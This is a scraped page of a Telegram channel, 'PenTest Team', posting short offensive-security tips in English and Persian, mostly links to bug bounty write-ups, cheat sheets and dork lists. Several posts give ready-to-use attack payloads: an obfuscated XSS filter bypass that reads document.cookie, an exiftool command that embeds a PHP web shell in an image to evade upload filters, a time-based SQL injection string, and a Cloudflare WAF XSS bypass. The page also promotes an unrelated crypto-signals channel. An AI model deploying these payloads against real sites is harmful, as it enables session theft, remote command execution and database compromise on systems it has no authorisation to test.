pentest_tm | Unsorted

Telegram-канал pentest_tm - PenTest Team

12331

Subscribe to a channel

PenTest Team

🗒 Bypass XSS Filter with Array


<noscript><p title="</noscript><img src=x onerror=([,O,B,J,E,C,,]=[]+{},[T,R,U,E,F,A,L,S,,,N]=[!!O]+!O+B.E)[X=C+O+N+S+T+R+U+C+T+O+R][X](A+L+E+R+T+(document.cookie))()>"> 



@PenTest_Tm

Читать полностью…

PenTest Team

🗒 Bypass File Upload Filtering

In image:


exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>'
shell.jpg
mv shell.jpg shell.php.jpg



@PenTest_Tm

Читать полностью…

PenTest Team

🗒 Bug Bounty Tips


@PenTest_Tm

Читать полностью…

PenTest Team

🗒 SQLMap Command Generator


@PenTest_Tm

Читать полностью…

PenTest Team

@PenTest_Tm

Читать полностью…

PenTest Team

🗒 MetaMask Subdomain Takeover (Consensys) | $500 Bug Bounty Poc | Subdomain Takeover Method

https://youtu.be/xP-u9i3N-3U?si=ooLVhCem9w5aSWos


@PenTest_Tm

Читать полностью…

PenTest Team

@cryptosignalsfree12

بچهایی که تو کار کریپتو هستن میتونید استفاده کنید

Читать полностью…

PenTest Team

🗒 Extract IPS From list of domains and then you can conduct your FUZZ/Manually check them for SDE /BAC , Ports , ..etc

grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'



@PenTest_Tm

Читать полностью…

PenTest Team

🗒 Wordpress Plugin Background Image Cropper v1.2 - Remote Code Execution

آسیب پذیری RCE از افزونه وردپرسیه Background Image CROPPER ورژن 1.2


https://www.exploit-db.com/exploits/51998


@PenTest_Tm

Читать полностью…

PenTest Team

🗒 Bug Bounty Cheat Sheets
SSRF
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery

https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/ssrf.md

CRLF

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CRLF%20Injection

https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crlf.md

@PenTest_Tm

Читать полностью…

PenTest Team

🗒 Bug Bounty Cheat Sheets

XSS:
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xss.md

https://github.com/ismailtasdelen/xss-payload-list

SQLI:

https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/sqli.md

@PenTest_Tm

Читать полностью…

PenTest Team

Google dorks

Link1
Link2
Link3
Link4
Link5
Link6
Link7

@PenTest_Tm

Читать полностью…

PenTest Team

🗒 How I Found Multiple XSS Vulnerabilities Using Unknown Techniques


https://infosecwriteups.com/how-i-found-multiple-xss-vulnerabilities-using-unknown-techniques-74f8e705ea0d


@PenTest_Tm

Читать полностью…

PenTest Team

🗒 One-click Account Take Over



https://dynnyd20.medium.com/one-click-account-take-over-e500929656ea

@PenTest_Tm

Читать полностью…

PenTest Team

🗒Open Redirect via Non\-Latin Subdomain in vcc\-\*\.8x8\.com/AGUI/test\.php


https://hackerone.com/reports/2331473


@PenTest_Tm

Читать полностью…

PenTest Team

🗒 SQL Injection

After this, use sqlmap to extract the database

-11+PROCEDURE+ANALYSE(EXTRACTVALUE(9859,CONCAT(0x5c,(BENCHMARK(110000000,MD5(0x7562756f))))),1)--


@PenTest_Tm

Читать полностью…

PenTest Team

🗒 XSS Payload Generator

تولید Payload با سناریو های مختلف و پشتیبانی از انواع متد با قابلیت ساخت پیلود برای دور زدن WAF و همچنین مبهم سازی پیلود و اضافه کردن کد جاوااسکریپت برای ساخت پیلود های پیشرفته تر و فیلتر پیشرفته کاراکترها برای دور زدن محدودیت هایی که هست


@PenTest_Tm

Читать полностью…

PenTest Team

🗒SSTI - RCE - CI


https://dolomite-slip-02b.notion.site/SSTI-RCE-CI-76c2f9d2808649c197d08b0d0ecd0e5b?pvs=25


@PenTest_Tm

Читать полностью…

PenTest Team

@PenTest_Tm

Читать полностью…

PenTest Team

🗒 How I was able to discover ATO Via IDOR vulnerability


0x_xnum/idor-leads-to-account-takeover-of-all-users-ato-27af312c8481" rel="nofollow">https://medium.com/@0x_xnum/idor-leads-to-account-takeover-of-all-users-ato-27af312c8481


@PenTest_Tm

Читать полностью…

PenTest Team

🗒 Optimizing Blind SQL Injection Detection with Content-Length Differences

https://bountysecurity.ai/blogs/news/optimizing-blind-sql-injection-detection-with-content-length-differences


@PenTest_Tm

Читать полностью…

PenTest Team

🗒 Bypass Upload Tricky

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files

@PenTest_Tm

Читать полностью…

PenTest Team

🗒 Subdomain Takeover Vulnerability



@PenTest_Tm

Читать полностью…

PenTest Team

GIT files Dorks

Universal for Google, Bing etc

https://github.com/Proviesec/google-dorks/blob/main/google-dorks-for-git-files.txt

Bug Bounty Dorks

Universal for Google, Bing etc


https://github.com/hackingbharat/bug-bounty-dorks-archive/blob/main/bbdorks

@PenTest_Tm

Читать полностью…

PenTest Team

🗒 XSS Bypass Cloudflare WAF


%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E


@PenTest_Tm

Читать полностью…

PenTest Team

Log files Dorks
Universal for Google, Bing etc:

https://github.com/Proviesec/google-dorks/blob/main/google-dorks-best-log.txt


@PenTest_Tm

Читать полностью…

PenTest Team

🗒 Accessing PostgreSQL Database Records


@PenTest_Tm

Читать полностью…

PenTest Team

🗒 Login Bypass


https://rajput623929.medium.com/bug-bounty-tutorial-login-bypass-technique-d7508856b2a1

@PenTest_Tm

Читать полностью…

PenTest Team

@cryptosignalsfree12

بچهایی که تو کار کریپتو هستن میتونید استفاده کنید

Читать полностью…

PenTest Team

بچها جلو جلو عیدتون مبارک ❤️

Читать полностью…
Subscribe to a channel